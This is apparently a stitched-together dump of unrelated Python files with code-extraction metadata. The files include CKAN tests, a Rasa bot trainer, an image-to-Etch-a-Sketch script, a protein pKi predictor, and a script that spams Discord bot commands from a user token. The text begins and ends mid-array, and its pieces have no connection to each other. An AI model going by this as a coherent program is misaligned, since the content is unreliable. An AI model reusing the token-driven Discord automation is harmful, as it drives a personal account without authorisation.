(["('ๅฐ็ฑณ่ดฆๅท็ปๅฝๅคฑ่ดฅ๏ผ' + r_json['desc'])"], {}), "('ๅฐ็ฑณ่ดฆๅท็ปๅฝๅคฑ่ดฅ๏ผ' + r_json['desc'])\n", (16020, 16050), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((16131, 16164), 'utils.utils.w_log', 'w_log', (['"""ๅฝๅ่ดฆๅท้่ฆ็ญไฟก้ช่ฏ็ ๏ผ่ฏทๅฐ่ฏไฟฎๆนUAๆ่ฎพๅคID"""'], {}), "('ๅฝๅ่ดฆๅท้่ฆ็ญไฟก้ช่ฏ็ ๏ผ่ฏทๅฐ่ฏไฟฎๆนUAๆ่ฎพๅคID')\n", (16136, 16164), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((16270, 16302), 'utils.utils.w_log', 'w_log', (['"""ๅฐ็ฑณ่ดฆๅท็ปๅฝๆๅ๏ผ็คพๅบ่ทๅ Cookie ๅคฑ่ดฅ"""'], {}), "('ๅฐ็ฑณ่ดฆๅท็ปๅฝๆๅ๏ผ็คพๅบ่ทๅ Cookie ๅคฑ่ดฅ')\n", (16275, 16302), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((16427, 16444), 'utils.utils.w_log', 'w_log', (['"""็ปๅฝๅฐ็ฑณ่ดฆๅทๅบ้"""'], {}), "('็ปๅฝๅฐ็ฑณ่ดฆๅทๅบ้')\n", (16432, 16444), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((16457, 16465), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (16462, 16465), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((17060, 17076), 'utils.utils.w_log', 'w_log', (['"""ๅ
ๆตๅ่ทๅๅคฑ่ดฅ"""'], {}), "('ๅ
ๆตๅ่ทๅๅคฑ่ดฅ')\n", (17065, 17076), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((3224, 3235), 'time.time', 'time.time', ([], {}), '()\n', (3233, 3235), False, 'import time\n'), ((4646, 4657), 'time.time', 'time.time', ([], {}), '()\n', (4655, 4657), False, 'import time\n'), ((7512, 7536), 'utils.utils.w_log', 'w_log', (['"""่ทๅ้ฎๅทIDๅคฑ่ดฅ๏ผ้ฎๅทIDไธบ็ฉบ"""'], {}), "('่ทๅ้ฎๅทIDๅคฑ่ดฅ๏ผ้ฎๅทIDไธบ็ฉบ')\n", (7517, 7536), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n')]
|
# encoding: utf-8
from ckan import model as ckan_model
from ckan.tests import factories as ckan_factories
from ckan.tests.helpers import call_action
from ckanext.metadata import model as ckanext_model
from ckanext.metadata.tests import (
ActionTestBase,
assert_error,
factories as ckanext_factories,
assert_object_matches_dict,
)
class TestOrganizationActions(ActionTestBase):
def _generate_organization(self, **kwargs):
return ckan_factories.Organization(user=self.normal_user, **kwargs)
def _generate_metadata_collection(self, **kwargs):
return ckanext_factories.MetadataCollection(user=self.normal_user, **kwargs)
def test_create_valid(self):
input_dict = {
'name': 'test-organization',
'title': 'Test Organization',
'description': 'This is a test organization',
}
result, obj = self.test_action('organization_create', **input_dict)
assert obj.type == 'organization'
assert obj.is_organization == True
assert_object_matches_dict(obj, input_dict)
def test_delete_valid(self):
organization = self._generate_organization()
self.test_action('organization_delete',
id=organization['id'])
def test_delete_valid_cascade_metadata_schemas(self):
organization = self._generate_organization()
metadata_schema = ckanext_factories.MetadataSchema(organization_id=organization['id'])
self.test_action('organization_delete',
id=organization['id'])
assert ckanext_model.MetadataSchema.get(metadata_schema['id']).state == 'deleted'
def test_delete_valid_cascade_metadata_collections(self):
organization = self._generate_organization()
metadata_collection = self._generate_metadata_collection(organization_id=organization['id'])
self.test_action('organization_delete',
id=organization['id'])
assert ckan_model.Group.get(metadata_collection['id']).state == 'deleted'
def test_delete_with_dependencies(self):
organization = self._generate_organization()
metadata_collection = self._generate_metadata_collection(organization_id=organization['id'])
metadata_schema = ckanext_factories.MetadataSchema(organization_id=organization['id'])
metadata_record = ckanext_factories.MetadataRecord(owner_org=organization['id'],
metadata_collection_id=metadata_collection['id'])
result, obj = self.test_action('organization_delete', should_error=True,
id=organization['id'])
assert_error(result, 'message', 'Organization has dependent metadata records')
assert ckan_model.Group.get(metadata_collection['id']).state == 'active'
assert ckanext_model.MetadataSchema.get(metadata_schema['id']).state == 'active'
call_action('metadata_record_delete', id=metadata_record['id'])
self.test_action('organization_delete',
id=organization['id'])
assert ckan_model.Group.get(metadata_collection['id']).state == 'deleted'
assert ckanext_model.MetadataSchema.get(metadata_schema['id']).state == 'deleted'
|
[
"ckanext.metadata.tests.factories.MetadataCollection",
"ckan.tests.helpers.call_action",
"ckanext.metadata.model.MetadataSchema.get",
"ckanext.metadata.tests.factories.MetadataSchema",
"ckan.model.Group.get",
"ckanext.metadata.tests.factories.MetadataRecord",
"ckanext.metadata.tests.assert_object_matches_dict",
"ckan.tests.factories.Organization",
"ckanext.metadata.tests.assert_error"
] |
[((461, 521), 'ckan.tests.factories.Organization', 'ckan_factories.Organization', ([], {'user': 'self.normal_user'}), '(user=self.normal_user, **kwargs)\n', (488, 521), True, 'from ckan.tests import factories as ckan_factories\n'), ((593, 662), 'ckanext.metadata.tests.factories.MetadataCollection', 'ckanext_factories.MetadataCollection', ([], {'user': 'self.normal_user'}), '(user=self.normal_user, **kwargs)\n', (629, 662), True, 'from ckanext.metadata.tests import ActionTestBase, assert_error, factories as ckanext_factories, assert_object_matches_dict\n'), ((1040, 1083), 'ckanext.metadata.tests.assert_object_matches_dict', 'assert_object_matches_dict', (['obj', 'input_dict'], {}), '(obj, input_dict)\n', (1066, 1083), False, 'from ckanext.metadata.tests import ActionTestBase, assert_error, factories as ckanext_factories, assert_object_matches_dict\n'), ((1405, 1473), 'ckanext.metadata.tests.factories.MetadataSchema', 'ckanext_factories.MetadataSchema', ([], {'organization_id': "organization['id']"}), "(organization_id=organization['id'])\n", (1437, 1473), True, 'from ckanext.metadata.tests import ActionTestBase, assert_error, factories as ckanext_factories, assert_object_matches_dict\n'), ((2283, 2351), 'ckanext.metadata.tests.factories.MetadataSchema', 'ckanext_factories.MetadataSchema', ([], {'organization_id': "organization['id']"}), "(organization_id=organization['id'])\n", (2315, 2351), True, 'from ckanext.metadata.tests import ActionTestBase, assert_error, factories as ckanext_factories, assert_object_matches_dict\n'), ((2378, 2494), 'ckanext.metadata.tests.factories.MetadataRecord', 'ckanext_factories.MetadataRecord', ([], {'owner_org': "organization['id']", 'metadata_collection_id': "metadata_collection['id']"}), "(owner_org=organization['id'],\n metadata_collection_id=metadata_collection['id'])\n", (2410, 2494), True, 'from ckanext.metadata.tests import ActionTestBase, assert_error, factories as ckanext_factories, assert_object_matches_dict\n'), ((2702, 2780), 'ckanext.metadata.tests.assert_error', 'assert_error', (['result', '"""message"""', '"""Organization has dependent metadata records"""'], {}), "(result, 'message', 'Organization has dependent metadata records')\n", (2714, 2780), False, 'from ckanext.metadata.tests import ActionTestBase, assert_error, factories as ckanext_factories, assert_object_matches_dict\n'), ((2960, 3023), 'ckan.tests.helpers.call_action', 'call_action', (['"""metadata_record_delete"""'], {'id': "metadata_record['id']"}), "('metadata_record_delete', id=metadata_record['id'])\n", (2971, 3023), False, 'from ckan.tests.helpers import call_action\n'), ((1586, 1641), 'ckanext.metadata.model.MetadataSchema.get', 'ckanext_model.MetadataSchema.get', (["metadata_schema['id']"], {}), "(metadata_schema['id'])\n", (1618, 1641), True, 'from ckanext.metadata import model as ckanext_model\n'), ((1990, 2037), 'ckan.model.Group.get', 'ckan_model.Group.get', (["metadata_collection['id']"], {}), "(metadata_collection['id'])\n", (2010, 2037), True, 'from ckan import model as ckan_model\n'), ((2796, 2843), 'ckan.model.Group.get', 'ckan_model.Group.get', (["metadata_collection['id']"], {}), "(metadata_collection['id'])\n", (2816, 2843), True, 'from ckan import model as ckan_model\n'), ((2877, 2932), 'ckanext.metadata.model.MetadataSchema.get', 'ckanext_model.MetadataSchema.get', (["metadata_schema['id']"], {}), "(metadata_schema['id'])\n", (2909, 2932), True, 'from ckanext.metadata import model as ckanext_model\n'), ((3135, 3182), 'ckan.model.Group.get', 'ckan_model.Group.get', (["metadata_collection['id']"], {}), "(metadata_collection['id'])\n", (3155, 3182), True, 'from ckan import model as ckan_model\n'), ((3217, 3272), 'ckanext.metadata.model.MetadataSchema.get', 'ckanext_model.MetadataSchema.get', (["metadata_schema['id']"], {}), "(metadata_schema['id'])\n", (3249, 3272), True, 'from ckanext.metadata import model as ckanext_model\n')]
|
from juno.resources import handler_request
from juno.resources.routes import onboarding_routes
def account_new_onboarding_request(dictionary):
return handler_request.post(onboarding_routes.get_base_url(), dictionary)
|
[
"juno.resources.routes.onboarding_routes.get_base_url"
] |
[((177, 209), 'juno.resources.routes.onboarding_routes.get_base_url', 'onboarding_routes.get_base_url', ([], {}), '()\n', (207, 209), False, 'from juno.resources.routes import onboarding_routes\n')]
|
import sys
import cv2
from matplotlib import pyplot as plt
from skimage.filters import sobel
import numpy as np
import math
from Etch import Etch
PRINT_ETCH = True
class Image:
def __init__(self):
self.points = []
self.image = cv2.imread("C:/Users/wnetz/Documents/etch-a-sketch/python/tests/protocol1_0/tri.png", 0)
self.imageShape = 0
self.etch = Etch()
self.sourceFile = open('C:/Users/wnetz/Documents/etch-a-sketch/python/tests/protocol1_0/test.txt', 'w')
self.sourceFile2 = open('C:/Users/wnetz/Documents/etch-a-sketch/python/tests/protocol1_0/test2.txt', 'w')
np.set_printoptions(threshold=sys.maxsize)
def processImage(self):
self.imageShape = self.image.shape
sig = .3
median = np.median(self.image)
lower = int(max(0,(1.0-sig)*median))
upper = int(min(255,(1.0+sig)*median))
self.image = cv2.Canny(self.image,lower,upper)
plt.imshow(self.image, cmap='gray')
plt.show()
def sort(self):
#loop x
for x in range(self.imageShape[0]):
#loop y
for y in range(self.imageShape[1]):
#if there is an edge pixle
if self.image[x][y] == 255:
point = (((x -self.imageShape[1] + 1) * -1) * 18000/self.imageShape[1], y * 12000/self.imageShape[0])
self.points.append(point)
#print ("("+str(point[0]) + "," + str(point[1])+")")
print("X",end='',file = self.sourceFile)
else:
print(" ",end='',file = self.sourceFile)
print("",file = self.sourceFile)
print(len(self.points))
def drawImage(self):
avg = 0
numpoints = 0
minpoint = [0,0]
length = len(self.points)
while len(self.points) > 1:
oldmin = minpoint
min = math.pow(math.pow(18000,2) + math.pow(12000,2),.5)
minpoint = []
lessmin = []
for point in self.points:
dist = math.pow(math.pow(point[0]-oldmin[0],2) + math.pow(point[1]-oldmin[1],2),.5)
if min < dist and dist < 100:
lessmin.append(point)
if dist < min:
min = dist
minpoint = point
#if min < 3:
#break
if len(minpoint) > 0:
print(str(min) + " (" + str(minpoint[0]) + "," + str(minpoint[1]) + ")", file = self.sourceFile2)
if min > 1:
avg = avg + min
numpoints = numpoints + 1
for point in lessmin:
self.points.remove(point)
if len(minpoint) > 0:
self.points.remove(minpoint)
self.etch.goto(minpoint[0],minpoint[1],PRINT_ETCH)
if len(self.points) % 1000 == 0:
print(len(self.points))
print(str(min) + " (" + str(minpoint) + ") ",len(self.points))
print("total " + str(avg) + " " + str(numpoints))
print("total " + str(avg/numpoints))
def end(self):
self.sourceFile.close()
self.sourceFile2.close()
self.etch.goto(0,0,PRINT_ETCH)
image = Image()
#print("enter image path")
#print(input())
image.processImage()
image.sort()
image.drawImage()
image.end()
|
[
"Etch.Etch",
"cv2.Canny",
"numpy.set_printoptions",
"matplotlib.pyplot.show",
"math.pow",
"numpy.median",
"matplotlib.pyplot.imshow",
"cv2.imread"
] |
[((249, 346), 'cv2.imread', 'cv2.imread', (['"""C:/Users/wnetz/Documents/etch-a-sketch/python/tests/protocol1_0/tri.png"""', '(0)'], {}), "(\n 'C:/Users/wnetz/Documents/etch-a-sketch/python/tests/protocol1_0/tri.png',\n 0)\n", (259, 346), False, 'import cv2\n'), ((386, 392), 'Etch.Etch', 'Etch', ([], {}), '()\n', (390, 392), False, 'from Etch import Etch\n'), ((627, 669), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'threshold': 'sys.maxsize'}), '(threshold=sys.maxsize)\n', (646, 669), True, 'import numpy as np\n'), ((775, 796), 'numpy.median', 'np.median', (['self.image'], {}), '(self.image)\n', (784, 796), True, 'import numpy as np\n'), ((910, 945), 'cv2.Canny', 'cv2.Canny', (['self.image', 'lower', 'upper'], {}), '(self.image, lower, upper)\n', (919, 945), False, 'import cv2\n'), ((952, 987), 'matplotlib.pyplot.imshow', 'plt.imshow', (['self.image'], {'cmap': '"""gray"""'}), "(self.image, cmap='gray')\n", (962, 987), True, 'from matplotlib import pyplot as plt\n'), ((996, 1006), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1004, 1006), True, 'from matplotlib import pyplot as plt\n'), ((1929, 1947), 'math.pow', 'math.pow', (['(18000)', '(2)'], {}), '(18000, 2)\n', (1937, 1947), False, 'import math\n'), ((1949, 1967), 'math.pow', 'math.pow', (['(12000)', '(2)'], {}), '(12000, 2)\n', (1957, 1967), False, 'import math\n'), ((2092, 2125), 'math.pow', 'math.pow', (['(point[0] - oldmin[0])', '(2)'], {}), '(point[0] - oldmin[0], 2)\n', (2100, 2125), False, 'import math\n'), ((2125, 2158), 'math.pow', 'math.pow', (['(point[1] - oldmin[1])', '(2)'], {}), '(point[1] - oldmin[1], 2)\n', (2133, 2158), False, 'import math\n')]
|
import os
import sys
path = os.environ.get('TRAVIS_BUILD_DIR')
sys.path.insert(0, path+'/protlearn')
import numpy as np
from preprocessing import txt_to_df
from feature_engineering import aaindex1
def test_aaindex1():
"Test AAIndex1"
# load data
df = txt_to_df(path+'/tests/docs/test_seq.txt', 0)
# get aaindex1
aaind1 = aaindex1(df)
# test shape
assert aaind1.shape == (4, 553)
# test some indices
ANDN920101 = np.array([4.3, 4.40555, 4.48714, 4.46])
QIAN880126 = np.array([.01166, -.17111, .05857, -.04333])
KARS160122 = np.array([2.014, 5.48522, 2.789, 1.751])
np.testing.assert_equal(np.round(aaind1['ANDN920101'], 3),\
np.round(ANDN920101, 3))
np.testing.assert_equal(np.round(aaind1['QIAN880126'], 3),\
np.round(QIAN880126, 3))
np.testing.assert_equal(np.round(aaind1['KARS160122'], 3),\
np.round(KARS160122, 3))
# test standardization (zscore)
aaind1_z = aaindex1(df, 'zscore')
# test mean = 0
for i in range(aaind1_z.shape[0]):
assert abs(round(aaind1_z.iloc[:,1].mean())) == 0
# test std --> 1
for i in range(aaind1_z.shape[0]):
assert round(aaind1_z.iloc[:,i].std(), 1) ==\
round(aaind1_z.iloc[:,0].std(), 1)
# test standardization (minmax)
aaind1_mm = aaindex1(df, 'minmax')
# test minimum and maximum
for i in range(aaind1_mm.shape[0]):
assert round(aaind1_mm.iloc[:,i].min()) == 0
assert round(aaind1_mm.iloc[:,i].max()) == 1
|
[
"preprocessing.txt_to_df",
"sys.path.insert",
"os.environ.get",
"numpy.array",
"numpy.round",
"feature_engineering.aaindex1"
] |
[((28, 62), 'os.environ.get', 'os.environ.get', (['"""TRAVIS_BUILD_DIR"""'], {}), "('TRAVIS_BUILD_DIR')\n", (42, 62), False, 'import os\n'), ((63, 102), 'sys.path.insert', 'sys.path.insert', (['(0)', "(path + '/protlearn')"], {}), "(0, path + '/protlearn')\n", (78, 102), False, 'import sys\n'), ((271, 318), 'preprocessing.txt_to_df', 'txt_to_df', (["(path + '/tests/docs/test_seq.txt')", '(0)'], {}), "(path + '/tests/docs/test_seq.txt', 0)\n", (280, 318), False, 'from preprocessing import txt_to_df\n'), ((354, 366), 'feature_engineering.aaindex1', 'aaindex1', (['df'], {}), '(df)\n', (362, 366), False, 'from feature_engineering import aaindex1\n'), ((471, 510), 'numpy.array', 'np.array', (['[4.3, 4.40555, 4.48714, 4.46]'], {}), '([4.3, 4.40555, 4.48714, 4.46])\n', (479, 510), True, 'import numpy as np\n'), ((528, 576), 'numpy.array', 'np.array', (['[0.01166, -0.17111, 0.05857, -0.04333]'], {}), '([0.01166, -0.17111, 0.05857, -0.04333])\n', (536, 576), True, 'import numpy as np\n'), ((590, 630), 'numpy.array', 'np.array', (['[2.014, 5.48522, 2.789, 1.751]'], {}), '([2.014, 5.48522, 2.789, 1.751])\n', (598, 630), True, 'import numpy as np\n'), ((1038, 1060), 'feature_engineering.aaindex1', 'aaindex1', (['df', '"""zscore"""'], {}), "(df, 'zscore')\n", (1046, 1060), False, 'from feature_engineering import aaindex1\n'), ((1403, 1425), 'feature_engineering.aaindex1', 'aaindex1', (['df', '"""minmax"""'], {}), "(df, 'minmax')\n", (1411, 1425), False, 'from feature_engineering import aaindex1\n'), ((659, 692), 'numpy.round', 'np.round', (["aaind1['ANDN920101']", '(3)'], {}), "(aaind1['ANDN920101'], 3)\n", (667, 692), True, 'import numpy as np\n'), ((723, 746), 'numpy.round', 'np.round', (['ANDN920101', '(3)'], {}), '(ANDN920101, 3)\n', (731, 746), True, 'import numpy as np\n'), ((776, 809), 'numpy.round', 'np.round', (["aaind1['QIAN880126']", '(3)'], {}), "(aaind1['QIAN880126'], 3)\n", (784, 809), True, 'import numpy as np\n'), ((840, 863), 'numpy.round', 'np.round', (['QIAN880126', '(3)'], {}), '(QIAN880126, 3)\n', (848, 863), True, 'import numpy as np\n'), ((893, 926), 'numpy.round', 'np.round', (["aaind1['KARS160122']", '(3)'], {}), "(aaind1['KARS160122'], 3)\n", (901, 926), True, 'import numpy as np\n'), ((957, 980), 'numpy.round', 'np.round', (['KARS160122', '(3)'], {}), '(KARS160122, 3)\n', (965, 980), True, 'import numpy as np\n')]
|
import serial
from .proxy import ObjectProxy
class Connection:
current_connection = None
_settings = None
_serial = None
def __init__(self, filename, baudrate=115200, **kw):
self.filename = filename
self.baudrate = baudrate
self.kw = kw
@property
def settings(self):
if self._settings is None:
from .configuration import Settings
self._settings = Settings(self)
return self._settings
def __enter__(self):
self._serial = serial.Serial(self.filename, self.baudrate, **self.kw)
self.__class__.current_connection = self
def __exit__(self, exc_type, exc_value, traceback):
self._serial.close()
self.__class__.current_connection = None
def send(self, data):
self._serial.write(data.encode())
def readlines(self):
data = self._serial.read(10)
connection = ObjectProxy(lambda: Connection.current_connection)
|
[
"serial.Serial"
] |
[((532, 586), 'serial.Serial', 'serial.Serial', (['self.filename', 'self.baudrate'], {}), '(self.filename, self.baudrate, **self.kw)\n', (545, 586), False, 'import serial\n')]
|
from django import forms
class EntryForm(forms.Form):
body = forms.CharField()
|
[
"django.forms.CharField"
] |
[((66, 83), 'django.forms.CharField', 'forms.CharField', ([], {}), '()\n', (81, 83), False, 'from django import forms\n')]
|
import os
import sys
import logging
import ipbes_ndr_analysis
LOGGER = logging.getLogger(__name__)
if __name__ == '__main__':
if len(sys.argv) != 3:
LOGGER.error(
"usage: python %s iam_token_path workspace_dir", sys.argv[0])
sys.exit(-1)
raw_iam_token_path = sys.argv[1]
raw_workspace_dir = sys.argv[2]
if not os.path.isfile(raw_iam_token_path):
LOGGER.error(
'%s is not a file, should be an iam token', raw_workspace_dir)
sys.exit(-1)
if os.path.isfile(raw_workspace_dir):
LOGGER.error(
'%s is supposed to be the workspace directory but points to an '
'existing file' % raw_workspace_dir)
sys.exit(-1)
ipbes_ndr_analysis.main(raw_iam_token_path, raw_workspace_dir)
|
[
"sys.exit",
"os.path.isfile",
"ipbes_ndr_analysis.main",
"logging.getLogger"
] |
[((77, 104), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (94, 104), False, 'import logging\n'), ((537, 570), 'os.path.isfile', 'os.path.isfile', (['raw_workspace_dir'], {}), '(raw_workspace_dir)\n', (551, 570), False, 'import os\n'), ((750, 812), 'ipbes_ndr_analysis.main', 'ipbes_ndr_analysis.main', (['raw_iam_token_path', 'raw_workspace_dir'], {}), '(raw_iam_token_path, raw_workspace_dir)\n', (773, 812), False, 'import ipbes_ndr_analysis\n'), ((272, 284), 'sys.exit', 'sys.exit', (['(-1)'], {}), '(-1)\n', (280, 284), False, 'import sys\n'), ((372, 406), 'os.path.isfile', 'os.path.isfile', (['raw_iam_token_path'], {}), '(raw_iam_token_path)\n', (386, 406), False, 'import os\n'), ((516, 528), 'sys.exit', 'sys.exit', (['(-1)'], {}), '(-1)\n', (524, 528), False, 'import sys\n'), ((732, 744), 'sys.exit', 'sys.exit', (['(-1)'], {}), '(-1)\n', (740, 744), False, 'import sys\n')]
|
import argparse
import glob
import os
import time
import logging
from rasa_addons.domains_merger import DomainsMerger
from rasa_addons.superagent import SuperAgent
from rasa_core.policies.memoization import MemoizationPolicy, AugmentedMemoizationPolicy
from rasa_core.policies.keras_policy import KerasPolicy
from rasa_core.agent import Agent
logger = logging.getLogger()
def concatenate_storyfiles(folder_path, prefix='stories', output='aggregated_stories.md'):
path_pattern = u'{}/{}*.md'.format(folder_path, prefix)
filenames = glob.glob(path_pattern)
with open(output, 'w') as outfile:
for fname in filenames:
with open(fname, 'r') as infile:
for line in infile:
outfile.write(line)
outfile.write("\n")
def train(stories_path, domain_path, policy_path):
root = os.path.dirname(__file__)
domain_path = os.path.join(root, domain_path)
stories_path = os.path.join(root, stories_path)
# generate_questions_data(stories_path, domain_path)
concatenate_storyfiles(stories_path, 'stories', os.path.join(stories_path, 'aggregated_stories.md'))
training_data_file = os.path.join(stories_path, 'aggregated_stories.md')
DomainsMerger(domain_path).merge().dump()
domain_path = os.path.join(domain_path, 'aggregated_domains.yaml')
from rasa_core.featurizers import (MaxHistoryTrackerFeaturizer,
BinarySingleStateFeaturizer)
policies = [
MemoizationPolicy( max_history=3),
KerasPolicy(MaxHistoryTrackerFeaturizer(BinarySingleStateFeaturizer(), max_history=3))
]
agent = SuperAgent(domain_path, policies=policies)
training_data = agent.load_data(training_data_file)
agent.train(training_data, epochs=200, validation_split=0.0)
agent.persist(policy_path)
logging.basicConfig(level="WARN")
def create_argparser():
parser = argparse.ArgumentParser(
description='Trains the bot.')
parser.add_argument('-s', '--stories', help="Stories path")
parser.add_argument('-d', '--domain', help="Domain path")
parser.add_argument('-p', '--policy', help="Policy path")
return parser
if __name__ == "__main__":
debug_mode = True
parser = create_argparser()
args = parser.parse_args()
start_time = time.time()
train(args.stories, args.domain, args.policy)
print("--- %s seconds ---" % (time.time() - start_time))
|
[
"rasa_core.featurizers.BinarySingleStateFeaturizer",
"argparse.ArgumentParser",
"logging.basicConfig",
"rasa_addons.superagent.SuperAgent",
"rasa_addons.domains_merger.DomainsMerger",
"os.path.dirname",
"time.time",
"glob.glob",
"rasa_core.policies.memoization.MemoizationPolicy",
"os.path.join",
"logging.getLogger"
] |
[((355, 374), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (372, 374), False, 'import logging\n'), ((544, 567), 'glob.glob', 'glob.glob', (['path_pattern'], {}), '(path_pattern)\n', (553, 567), False, 'import glob\n'), ((860, 885), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (875, 885), False, 'import os\n'), ((904, 935), 'os.path.join', 'os.path.join', (['root', 'domain_path'], {}), '(root, domain_path)\n', (916, 935), False, 'import os\n'), ((955, 987), 'os.path.join', 'os.path.join', (['root', 'stories_path'], {}), '(root, stories_path)\n', (967, 987), False, 'import os\n'), ((1175, 1226), 'os.path.join', 'os.path.join', (['stories_path', '"""aggregated_stories.md"""'], {}), "(stories_path, 'aggregated_stories.md')\n", (1187, 1226), False, 'import os\n'), ((1292, 1344), 'os.path.join', 'os.path.join', (['domain_path', '"""aggregated_domains.yaml"""'], {}), "(domain_path, 'aggregated_domains.yaml')\n", (1304, 1344), False, 'import os\n'), ((1656, 1698), 'rasa_addons.superagent.SuperAgent', 'SuperAgent', (['domain_path'], {'policies': 'policies'}), '(domain_path, policies=policies)\n', (1666, 1698), False, 'from rasa_addons.superagent import SuperAgent\n'), ((1856, 1889), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': '"""WARN"""'}), "(level='WARN')\n", (1875, 1889), False, 'import logging\n'), ((1929, 1983), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Trains the bot."""'}), "(description='Trains the bot.')\n", (1952, 1983), False, 'import argparse\n'), ((2331, 2342), 'time.time', 'time.time', ([], {}), '()\n', (2340, 2342), False, 'import time\n'), ((1097, 1148), 'os.path.join', 'os.path.join', (['stories_path', '"""aggregated_stories.md"""'], {}), "(stories_path, 'aggregated_stories.md')\n", (1109, 1148), False, 'import os\n'), ((1508, 1540), 'rasa_core.policies.memoization.MemoizationPolicy', 'MemoizationPolicy', ([], {'max_history': '(3)'}), '(max_history=3)\n', (1525, 1540), False, 'from rasa_core.policies.memoization import MemoizationPolicy, AugmentedMemoizationPolicy\n'), ((1591, 1620), 'rasa_core.featurizers.BinarySingleStateFeaturizer', 'BinarySingleStateFeaturizer', ([], {}), '()\n', (1618, 1620), False, 'from rasa_core.featurizers import MaxHistoryTrackerFeaturizer, BinarySingleStateFeaturizer\n'), ((2427, 2438), 'time.time', 'time.time', ([], {}), '()\n', (2436, 2438), False, 'import time\n'), ((1232, 1258), 'rasa_addons.domains_merger.DomainsMerger', 'DomainsMerger', (['domain_path'], {}), '(domain_path)\n', (1245, 1258), False, 'from rasa_addons.domains_merger import DomainsMerger\n')]
|
from colored import fg, attr
import requests
import threading
import time
import random
r = fg(241) # Setup color variables
r2 = fg(255)
b = fg(31)
w = fg(15)
def start():
token = input(f"\n {r2}[{b}?{r2}] Token: ")
channel = input(f" {r2}[{b}?{r2}] Channel Id: ")
def execute_command(command = "", cooldown = 0):
print(f"{r2}[{b}!{r2} Loaded: '{command}' With cooldown of {cooldown} Seconds")
while True:
requests.post(
f"https://discord.com/api/channels/{channel}/messages",
data = {'content': command},
headers = {
'User-Agent' : 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7',
'Authorization' : token
}
)
print(f"{r2}[{b}+{r2}] '{command}' Ran successfully")
time.sleep(cooldown + random.randint(2, 10))
commands = {
"pls beg" : 45,
"pls hunt" : 40,
"pls fish" : 40,
"pls daily" : 86400
}
print()
for cmd, cooldown in commands.items():
threading.Thread(target = execute_command, kwargs = {"command" : cmd, "cooldown" : cooldown}).start()
time.sleep(5)
|
[
"threading.Thread",
"random.randint",
"colored.fg",
"time.sleep",
"requests.post"
] |
[((93, 100), 'colored.fg', 'fg', (['(241)'], {}), '(241)\n', (95, 100), False, 'from colored import fg, attr\n'), ((130, 137), 'colored.fg', 'fg', (['(255)'], {}), '(255)\n', (132, 137), False, 'from colored import fg, attr\n'), ((142, 148), 'colored.fg', 'fg', (['(31)'], {}), '(31)\n', (144, 148), False, 'from colored import fg, attr\n'), ((153, 159), 'colored.fg', 'fg', (['(15)'], {}), '(15)\n', (155, 159), False, 'from colored import fg, attr\n'), ((1236, 1249), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (1246, 1249), False, 'import time\n'), ((449, 698), 'requests.post', 'requests.post', (['f"""https://discord.com/api/channels/{channel}/messages"""'], {'data': "{'content': command}", 'headers': "{'User-Agent':\n 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7'\n , 'Authorization': token}"}), "(f'https://discord.com/api/channels/{channel}/messages', data=\n {'content': command}, headers={'User-Agent':\n 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7'\n , 'Authorization': token})\n", (462, 698), False, 'import requests\n'), ((1126, 1217), 'threading.Thread', 'threading.Thread', ([], {'target': 'execute_command', 'kwargs': "{'command': cmd, 'cooldown': cooldown}"}), "(target=execute_command, kwargs={'command': cmd, 'cooldown':\n cooldown})\n", (1142, 1217), False, 'import threading\n'), ((912, 933), 'random.randint', 'random.randint', (['(2)', '(10)'], {}), '(2, 10)\n', (926, 933), False, 'import random\n')]
|
from __future__ import print_function, absolute_import
# Script to predict (or test) the model using protein (kinase) sequence and SMILE pattern of a compound.
# Usage: python2 get_kinase_pki.py protein_sequence "SMILE_Pattern"
import numpy as np
from pydpi.pypro import PyPro
import pandas as pd
import json
import multiprocessing as mp
import os
import sys
import numpy as np
from sklearn.externals import joblib
from utility import FeatureGenerator
#from keras.models import load_model
import pickle
class pKiPred(object):
def __init__(self):
self.model = joblib.load(os.path.join(os.path.dirname(__file__), 'Random_forest_gridsearch_py27.mdl'))
def get_smi_features(self, smiles):
try:
feat_gen = FeatureGenerator(smiles)
features = feat_gen.toTPATF()
return features
except:
return None
def get_features(self, seq, smi):
p = PyPro()
try:
p.ReadProteinSequence(seq)
features = list(p.GetALL().values())
smi_features = self.get_smi_features(smi)
smi_features2 = list(np.array([f for f in smi_features], dtype=np.float32))
total_features = np.array(features+smi_features2)[np.newaxis, :]
# total_features = np.array(smi_features2+features)[np.newaxis, :] # does not work...!
return total_features
except Exception as e:
print(str(e))
return None
def predict(self, seq, smi):
protein_feature = self.get_features(seq, smi)
return self.model.predict(protein_feature)
def main():
seq = "MGCGCSSHPEDDWMENIDVCENCHYPIVPLDGKGTLLIRNGSEVRDPLVTYEGSNPPASPLQDNLVIALHSYEPSHDGDLGFEKGEQLRILEQSGEWWKAQSLTTGQEGFIPFNFVAKANSLEPEPWFFK<KEY>"
smile = "CC(C)Oc1ccc(cc1Cl)c2noc(n2)c3ccc(N[C@H]4CC[C@H](C4)C(=O)O)cc3"
pkipred = pKiPred()
if len(sys.argv) == 1:
print(pkipred.predict(seq, smile))
else:
print(pkipred.predict(sys.argv[1], sys.argv[2]))
if __name__=="__main__":
main()
|
[
"pydpi.pypro.PyPro",
"os.path.dirname",
